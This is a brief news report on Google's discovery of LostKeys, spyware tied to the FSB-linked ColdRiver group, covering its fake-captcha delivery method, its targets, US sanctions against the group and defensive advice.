Google discovers new Russian spyware LostKeys linked to FSB

Google has announced (via Android Headlines) the discovery of a new Russian spyware called LostKeys, used by the ColdRiver hacking group, which is affiliated with the Russian FSB. The software is designed to steal files and system data from Western organizations.

According to the Google Threat Intelligence Group (GTIG), LostKeys is used in ad hoc attacks like ClickFix, which are based on social engineering and start with a fake captcha. Victims are tricked into running malicious PowerShell scripts that open the way for additional malware to be downloaded and executed. The main goal is to install LostKeys, which acts as a digital vacuum cleaner, extracting files, directories, and system information. Hackers also use other malware, including SPICA, to obtain documents.

The ColdRiver group has been active since 2017 and is known by other names such as Star Blizzard and Callisto Group. It has reportedly become more active in recent years, especially since the beginning of Russia’s invasion of Ukraine. The group specializes in cyber espionage, targeting government and defense institutions, think tanks, politicians, journalists, and non-governmental organizations.

The US has already imposed sanctions on individual members of the group and announced a $10 million reward for information leading to their arrest.

Google experts emphasize the need to strengthen cybersecurity, especially for organizations that could become potential victims of ColdRiver attacks. They recommend using Google's Advanced Protection, as well as regularly updating security systems to prevent such threats.